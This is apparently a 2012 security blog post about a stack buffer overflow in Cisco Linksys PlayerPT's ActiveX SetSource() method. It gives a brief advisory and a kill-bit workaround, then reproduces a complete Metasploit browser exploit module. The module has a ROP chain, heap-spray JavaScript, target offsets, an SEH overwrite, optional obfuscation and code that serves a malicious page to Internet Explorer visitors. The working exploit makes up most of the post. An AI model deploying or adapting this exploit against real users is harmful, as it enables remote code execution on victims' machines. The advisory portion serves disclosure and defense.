Nov
15
2012

Cisco Linksys PlayerPT ActiveX Control Buffer Overflow

Cisco Linksys PlayerPT ActiveX is prone to an overflow condition. The SetSource() function fails to properly sanitize user-supplied input resulting in a stack based buffer overflow. With a specially crafted argument, a remote attacker can potentially cause execution of arbitrary code.

Solution: Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to correct the flaw by implementing the following workaround: set the kill-bit on the PlayerPT.ocx ActiveX Control [ {9E065E4A-BD9D-4547-8F90-985DC62A5591} ]. See Microsoft KB article 240797 for additional details.

Vulnerability (Only for test):

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh
	include Msf::Exploit::Remote::BrowserAutopwn

	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "8.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:classid    => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
		:method     => "SetSource",
		:rank       => NormalRanking
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cisco Linksys PlayerPT ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15
				as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ
				Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in
				the SetSource method, allows to trigger a stack based buffer overflow which leads
				to code execution under the context of the user visiting a malicious web page.
			},
			'Author'         =>
				[
					'rgod', # Vulnerabilty Discovery and PoC
					'juan vazquez' # Metasploit module

				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'OSVDB', '80297' ],
					[ 'BID', '54588' ],
					[ 'EDB', '18641' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',

				},
			'Payload'        =>
				{
					'Space' => 1024,
					'DisableNops' => true,
					'BadChars'    => "\x00\x0d\x0a\x5c",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					# Cisco Linksys PlayerPT ActiveX Control 1.0.0.15
					[ 'Automatic', { } ],
					[
						'IE 6 on Windows XP SP3',
						{
							'Spray' => true,
							'SprayBlocks' => 0x185,
							'SprayOffset' => '0x0',
							'OffsetStackBottom' => 8556
						}
					],
					[
						'IE 7 on Windows XP SP3 / Windows Vista SP2',
						{
							'Spray' => true,
							'SprayBlocks' => 0x185,
							'SprayOffset' => '0x0',
							'OffsetStackBottom' => 3220
						}
					],
					[
						'IE 8 on Windows XP SP3',
						{
							'Spray' => false,
							'OffsetRop' => 160,
							'Offset' => 456,
							'Ret' => 0x1002c536, # ADD ESP,0A2C # RETN from PlayerPT.ocx
							'OffsetStackBottom' => 4108
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Mar 22 2012',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class
		)

	end

	def get_spray(t, js_code, js_nops)

		spray = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;

		var offset = nops.substring(0, #{t['SprayOffset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);

		heap_obj.gc();
		for (var z=1; z < #{t['SprayBlocks']}; z++) {
			heap_obj.alloc(block);
		}

		JS

		return spray

	end

	# rop chain generated with mona.py
	def create_rop_chain()

		rop_gadgets =
			[
				0x77c2f271,	# POP EBP # RETN [msvcrt.dll]
				0x77c2f271,	# skip 4 bytes [msvcrt.dll]
				0x77c5335d,	# POP EBX # RETN [msvcrt.dll]
				0xffffffff,	#
				0x77c127e1,	# INC EBX # RETN [msvcrt.dll]
				0x77c127e1,	# INC EBX # RETN [msvcrt.dll]
				0x77c4e392,	# POP EAX # RETN [msvcrt.dll]
				0x2cfe1467,	# put delta into eax (-> put 0x00001000 into edx)
				0x77c4eb80,	# ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
				0x77c58fbc,	# XCHG EAX,EDX # RETN [msvcrt.dll]
				0x77c34de1,	# POP EAX # RETN [msvcrt.dll]
				0x2cfe04a7,	# put delta into eax (-> put 0x00000040 into ecx)
				0x77c4eb80,	# ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
				0x77c14001,	# XCHG EAX,ECX # RETN [msvcrt.dll]
				0x77c479e2,	# POP EDI # RETN [msvcrt.dll]
				0x77c39f92,	# RETN (ROP NOP) [msvcrt.dll]
				0x77c3b8ba,	# POP ESI # RETN [msvcrt.dll]
				0x77c2aacc,	# JMP [EAX] [msvcrt.dll]
				0x77c4e392,	# POP EAX # RETN [msvcrt.dll]
				0x77c1110c,	# ptr to &VirtualAlloc() [IAT msvcrt.dll]
				0x77c12df9,	# PUSHAD # RETN [msvcrt.dll]
				0x77c51025,	# ptr to 'push esp #  ret ' [msvcrt.dll]
			].pack("V*")

		return rop_gadgets
	end

	def get_payload(my_target)

		case my_target.name
		when /IE 6 on Windows XP SP3/
			my_payload = "\x0c" * my_target['OffsetStackBottom']
			return my_payload
		when /IE 7 on Windows XP SP3 \/ Windows Vista SP2/
			my_payload = "\x0c" * my_target['OffsetStackBottom']
			return my_payload
		when /IE 8 on Windows XP SP3/
			my_payload = rand_text_alpha(my_target['OffsetRop'])
			my_payload << create_rop_chain
			my_payload << make_nops(my_target['Offset'] - my_payload.length)
			my_payload << generate_seh_record(my_target.ret)
			my_payload << payload.encoded
			my_payload << rand_text_alpha(my_target['OffsetStackBottom'] - my_payload.length)
			return my_payload
		end

	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'
		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1] #IE 6 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2] #IE 7 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[3] #IE 8 on Windows XP SP3
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
			return targets[2] #IE 7 on Windows Vista SP2
		else
			return nil
		end
	end

	def on_request_uri(cli, request)

		agent = request.headers['User-Agent']
		print_status("User-agent: #{agent}")

		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have a setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		js = ""

		if my_target['Spray']
			p = payload.encoded
			js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
			js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
			js = get_spray(my_target, js_code, js_nops)

			js = heaplib(js, {:noobfu => true})

			if datastore['OBFUSCATE']
				js = ::Rex::Exploitation::JSObfu.new(js)
				js.obfuscate
			end
		end

		sploit = get_payload(my_target)
		sploit = sploit.gsub(/"/, "\\\"")

		html = <<-MYHTML
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object>
		<script>
			obj.SetSource("","","","","#{sploit}");
		</script>
		</body>
		</html>
		MYHTML

		html = html.gsub(/^\t\t/, '')

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end
end

References:

Summary
Article Name
Cisco Linksys PlayerPT ActiveX Control Buffer Overflow
Author
Description
The SetSource() function fails to properly sanitize user-supplied input resulting in a stack based buffer overflow. With a specially crafted argument, a remote attacker can potentially cause execution of arbitrary code.

Email Updates

Enter your email address to receive notifications of new posts.

Ciscozine on Facebook


Partners


Partner's Blog
BGP

BGP SECURITY MONTH:

BGP protocol
BGP Security

NOCTION IRP PRODUCT PRESENTATION: